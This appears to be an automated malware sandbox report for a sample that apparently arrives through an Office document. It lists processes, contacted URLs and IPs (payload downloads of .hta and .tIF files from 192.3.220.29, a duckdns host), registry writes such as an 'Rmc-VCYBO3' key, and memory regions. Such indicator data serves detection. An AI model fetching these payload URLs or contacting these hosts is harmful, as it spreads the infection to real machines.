C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
|
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F34.tmp"
"c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP"
|
There are 10 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4
|
unknown
|
|
|
|
http://192.3.220.29/45/HDRDDG.txt
|
192.3.220.29
|
|
|
|
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF
|
192.3.220.29
|
|
|
|
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta
|
192.3.220.29
|
|
|
|
banaya.duckdns.org
|
|
||
|
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC(
|
unknown
|
||
|
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lace4
|
unknown
|
||
|
https://provit.uk/VHbTI8?þ=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&laceyX
|
unknown
|
||
|
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan0
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaC:
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://provit.uk/
|
unknown
|
||
|
http://schemas.dorg/wbem/wsman/1/wsm
|
unknown
|
||
|
https://1017.filemail.com
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
https://provit.uk/VHbTI8?þ=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace~
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
https://provit.uk/VHbTI8?þ=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace
|
198.244.140.41
|
||
|
http://go.micros
|
unknown
|
||
|
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htahttp://192.3.220.29/45/ww/
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta...
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://provit.uk/VQ
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://www.html-code-generator.com
|
unknown
|
||
|
http://192.3.220.29/45/seehaving
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
|
142.215.209.78
|
||
|
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&laceg
|
unknown
|
||
|
https://provit.uk/0
|
unknown
|
||
|
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lace
|
unknown
|
||
|
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta...K
|
unknown
|
||
|
http://192.3.220.29/
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFp
|
unknown
|
||
|
https://provit.uk/VHbTI8?þ=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacew
|
unknown
|
||
|
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:
|
unknown
|
||
|
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
https://provit.uk/VHbTI8?þ=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacek
|
unknown
|
There are 39 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
banaya.duckdns.org
|
192.3.101.149
|
|
|
|
provit.uk
|
198.244.140.41
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
ip.1017.filemail.com
|
142.215.209.78
|
||
|
1017.filemail.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.3.220.29
|
unknown
|
United States
|
|
|
|
192.3.101.149
|
banaya.duckdns.org
|
United States
|
|
|
|
142.215.209.78
|
ip.1017.filemail.com
|
Canada
|
||
|
198.244.140.41
|
provit.uk
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
;60
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2B77C
|
2B77C
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
'>0
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\37FAB
|
37FAB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\382C6
|
382C6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\38CF4
|
38CF4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\382C6
|
382C6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Rmc-VCYBO3
|
exepath
|
||
|
HKEY_CURRENT_USER\Software\Rmc-VCYBO3
|
licence
|
||
|
HKEY_CURRENT_USER\Software\Rmc-VCYBO3
|
time
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 82 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
575000
|
heap
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
5AA1000
|
heap
|
page read and write
|
||
|
554000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
23CD000
|
heap
|
page read and write
|
||
|
2A34000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
5C79000
|
heap
|
page read and write
|
||
|
47F000
|
heap
|
page read and write
|
||
|
7FE89C40000
|
trusted library allocation
|
page read and write
|
||
|
4AD0000
|
heap
|
page read and write
|
||
|
1BF30000
|
heap
|
page read and write
|
||
|
3D2000
|
heap
|
page read and write
|
||
|
4C49000
|
heap
|
page read and write
|
||
|
47F000
|
heap
|
page read and write
|
||
|
2F4000
|
heap
|
page read and write
|
||
|
5709000
|
heap
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
33D9000
|
trusted library allocation
|
page read and write
|
||
|
36C0000
|
trusted library allocation
|
page execute
|
||
|
541A000
|
heap
|
page read and write
|
||
|
1B26000
|
heap
|
page read and write
|
||
|
594C000
|
heap
|
page read and write
|
||
|
3EE7000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
3A33000
|
heap
|
page read and write
|
||
|
570C000
|
heap
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
1ACC4000
|
heap
|
page read and write
|
||
|
4C4E000
|
heap
|
page read and write
|
||
|
49F000
|
direct allocation
|
page read and write
|
||
|
3601000
|
heap
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
1D60000
|
heap
|
page read and write
|
||
|
452000
|
heap
|
page read and write
|
||
|
CA000
|
heap
|
page read and write
|
||
|
4A1000
|
heap
|
page read and write
|
||
|
13A000
|
heap
|
page read and write
|
||
|
365D000
|
trusted library allocation
|
page read and write
|
||
|
5988000
|
heap
|
page read and write
|
||
|
2C5000
|
heap
|
page read and write
|
||
|
405000
|
heap
|
page read and write
|
||
|
7FE899C6000
|
trusted library allocation
|
page read and write
|
||
|
2A2B000
|
trusted library allocation
|
page read and write
|
||
|
597A000
|
heap
|
page read and write
|
||
|
1AE9E000
|
stack
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
5477000
|
heap
|
page read and write
|
||
|
12161000
|
trusted library allocation
|
page read and write
|
||
|
4290000
|
trusted library allocation
|
page read and write
|
||
|
57FC000
|
heap
|
page read and write
|
||
|
34D1000
|
trusted library allocation
|
page read and write
|
||
|
550F000
|
heap
|
page read and write
|
||
|
5704000
|
heap
|
page read and write
|
||
|
40A000
|
heap
|
page read and write
|
||
|
2A48000
|
trusted library allocation
|
page read and write
|
||
|
5CB4000
|
heap
|
page read and write
|
||
|
4B8000
|
heap
|
page read and write
|
||
|
25C000
|
stack
|
page read and write
|
||
|
25D1000
|
trusted library allocation
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
3A46000
|
heap
|
page read and write
|
||
|
39C8000
|
heap
|
page read and write
|
||
|
594C000
|
heap
|
page read and write
|
||
|
12131000
|
trusted library allocation
|
page read and write
|
||
|
59C4000
|
heap
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
DC000
|
heap
|
page read and write
|
||
|
3A33000
|
heap
|
page read and write
|
||
|
EC000
|
heap
|
page read and write
|
||
|
344000
|
heap
|
page read and write
|
||
|
42F000
|
heap
|
page read and write
|
||
|
494000
|
heap
|
page read and write
|
||
|
5424000
|
heap
|
page read and write
|
||
|
47B000
|
heap
|
page read and write
|
||
|
14F000
|
heap
|
page read and write
|
||
|
1A838000
|
stack
|
page read and write
|
||
|
4528000
|
trusted library allocation
|
page read and write
|
||
|
1AC61000
|
heap
|
page read and write
|
||
|
23CD000
|
heap
|
page read and write
|
||
|
5470000
|
heap
|
page read and write
|
||
|
597C000
|
heap
|
page read and write
|
||
|
306000
|
heap
|
page read and write
|
||
|
45A000
|
heap
|
page read and write
|
||
|
423000
|
heap
|
page read and write
|
||
|
27D2000
|
trusted library allocation
|
page read and write
|
||
|
97A8000
|
trusted library allocation
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
3637000
|
heap
|
page read and write
|
||
|
4C26000
|
heap
|
page read and write
|
||
|
3F1C000
|
heap
|
page read and write
|
||
|
326B000
|
stack
|
page read and write
|
||
|
54FE000
|
heap
|
page read and write
|
||
|
2FD000
|
heap
|
page read and write
|
||
|
4B5D000
|
heap
|
page read and write
|
||
|
22C0000
|
heap
|
page execute and read and write
|
||
|
2A2B000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AC3000
|
trusted library allocation
|
page read and write
|
||
|
3B70000
|
trusted library allocation
|
page read and write
|
||
|
3EF000
|
heap
|
page read and write
|
||
|
3FD000
|
heap
|
page read and write
|
||
|
16A000
|
heap
|
page read and write
|
||
|
3E92000
|
heap
|
page read and write
|
||
|
221F000
|
trusted library allocation
|
page read and write
|
||
|
57FA000
|
heap
|
page read and write
|
||
|
1A746000
|
heap
|
page read and write
|
||
|
4C7F000
|
heap
|
page read and write
|
||
|
1A949000
|
stack
|
page read and write
|
||
|
15B000
|
heap
|
page read and write
|
||
|
40A000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
5994000
|
heap
|
page read and write
|
||
|
1E34000
|
heap
|
page read and write
|
||
|
E4000
|
heap
|
page read and write
|
||
|
1BC6000
|
heap
|
page read and write
|
||
|
3D3000
|
heap
|
page read and write
|
||
|
1A731000
|
heap
|
page read and write
|
||
|
40E000
|
heap
|
page read and write
|
||
|
5501000
|
heap
|
page read and write
|
||
|
4B9000
|
heap
|
page read and write
|
||
|
542A000
|
heap
|
page read and write
|
||
|
5503000
|
heap
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
3A2000
|
heap
|
page read and write
|
||
|
6328000
|
trusted library allocation
|
page read and write
|
||
|
3D4000
|
heap
|
page read and write
|
||
|
33D9000
|
trusted library allocation
|
page read and write
|
||
|
245000
|
stack
|
page read and write
|
||
|
367D000
|
trusted library allocation
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
2A32000
|
trusted library allocation
|
page read and write
|
||
|
FE000
|
heap
|
page read and write
|
||
|
7FE8992B000
|
trusted library allocation
|
page read and write
|
||
|
2A4A000
|
trusted library allocation
|
page read and write
|
||
|
5AB0000
|
heap
|
page read and write
|
||
|
59C9000
|
heap
|
page read and write
|
||
|
3D3000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
42A000
|
heap
|
page read and write
|
||
|
5CB2000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
heap
|
page read and write
|
||
|
30F000
|
heap
|
page read and write
|
||
|
39C2000
|
heap
|
page read and write
|
||
|
314F000
|
stack
|
page read and write
|
||
|
20C0000
|
heap
|
page execute and read and write
|
||
|
149000
|
heap
|
page read and write
|
||
|
38A000
|
heap
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
364B000
|
heap
|
page read and write
|
||
|
3653000
|
trusted library allocation
|
page read and write
|
||
|
258000
|
stack
|
page read and write
|
||
|
3655000
|
heap
|
page read and write
|
||
|
550D000
|
heap
|
page read and write
|
||
|
449000
|
heap
|
page read and write
|
||
|
5650000
|
heap
|
page read and write
|
||
|
2A32000
|
trusted library allocation
|
page read and write
|
||
|
153000
|
heap
|
page read and write
|
||
|
2188000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
12C000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
5ADB000
|
heap
|
page read and write
|
||
|
5911000
|
heap
|
page read and write
|
||
|
E8000
|
heap
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
33D9000
|
trusted library allocation
|
page read and write
|
||
|
47A8000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
2A25000
|
trusted library allocation
|
page read and write
|
||
|
2BC4000
|
heap
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
2FE000
|
heap
|
page read and write
|
||
|
4C7D000
|
heap
|
page read and write
|
||
|
5418000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
59CD000
|
heap
|
page read and write
|
||
|
3A8F000
|
heap
|
page read and write
|
||
|
23D000
|
stack
|
page read and write
|
||
|
3CD000
|
heap
|
page read and write
|
||
|
550A000
|
heap
|
page read and write
|
||
|
5D98000
|
heap
|
page read and write
|
||
|
370000
|
direct allocation
|
page read and write
|
||
|
3430000
|
trusted library allocation
|
page read and write
|
||
|
12C000
|
heap
|
page read and write
|
||
|
5470000
|
heap
|
page read and write
|
||
|
1D92000
|
trusted library allocation
|
page read and write
|
||
|
4C11000
|
heap
|
page read and write
|
||
|
5709000
|
heap
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
3BF0000
|
trusted library allocation
|
page read and write
|
||
|
5AB8000
|
heap
|
page read and write
|
||
|
410000
|
heap
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
1AC72000
|
heap
|
page read and write
|
||
|
130000
|
heap
|
page read and write
|
||
|
3E1000
|
heap
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
44E000
|
heap
|
page read and write
|
||
|
3A46000
|
heap
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
3F29000
|
heap
|
page read and write
|
||
|
443000
|
heap
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
65A8000
|
trusted library allocation
|
page read and write
|
||
|
1E30000
|
heap
|
page read and write
|
||
|
23A4000
|
trusted library allocation
|
page read and write
|
||
|
1A4EF000
|
stack
|
page read and write
|
||
|
3F9000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AF4000
|
trusted library allocation
|
page read and write
|
||
|
1A1EC000
|
stack
|
page read and write
|
||
|
18B000
|
heap
|
page read and write
|
||
|
54EF000
|
heap
|
page read and write
|
||
|
1C00000
|
trusted library allocation
|
page read and write
|
||
|
3990000
|
trusted library allocation
|
page read and write
|
||
|
3CD000
|
heap
|
page read and write
|
||
|
42A000
|
heap
|
page read and write
|
||
|
47F000
|
heap
|
page read and write
|
||
|
578C000
|
heap
|
page read and write
|
||
|
13F000
|
heap
|
page read and write
|
||
|
1C0C8000
|
heap
|
page read and write
|
||
|
20FE000
|
heap
|
page execute and read and write
|
||
|
1C80000
|
trusted library allocation
|
page read and write
|
||
|
1DC0000
|
direct allocation
|
page read and write
|
||
|
7FE89913000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F3000
|
heap
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
350F000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
3637000
|
heap
|
page read and write
|
||
|
1A4EE000
|
stack
|
page read and write | page guard
|
||
|
2BAA000
|
stack
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
2D0000
|
heap
|
page read and write
|
||
|
3AD000
|
heap
|
page read and write
|
||
|
88000
|
heap
|
page read and write
|
||
|
1C2BF000
|
stack
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
31E000
|
heap
|
page read and write
|
||
|
5477000
|
heap
|
page read and write
|
||
|
10C000
|
heap
|
page read and write
|
||
|
22D0000
|
heap
|
page execute and read and write
|
||
|
39F000
|
heap
|
page read and write
|
||
|
4C4E000
|
heap
|
page read and write
|
||
|
18B000
|
heap
|
page read and write
|
||
|
4C38000
|
heap
|
page read and write
|
||
|
42B000
|
heap
|
page read and write
|
||
|
3647000
|
heap
|
page read and write
|
||
|
5AB9000
|
heap
|
page read and write
|
||
|
54FB000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
3990000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
5421000
|
heap
|
page read and write
|
||
|
2A53000
|
trusted library allocation
|
page read and write
|
||
|
550F000
|
heap
|
page read and write
|
||
|
39C0000
|
trusted library allocation
|
page read and write
|
||
|
2A29000
|
trusted library allocation
|
page read and write
|
||
|
4B9000
|
heap
|
page read and write
|
||
|
116000
|
heap
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
3CDF000
|
stack
|
page read and write
|
||
|
4B17000
|
heap
|
page read and write
|
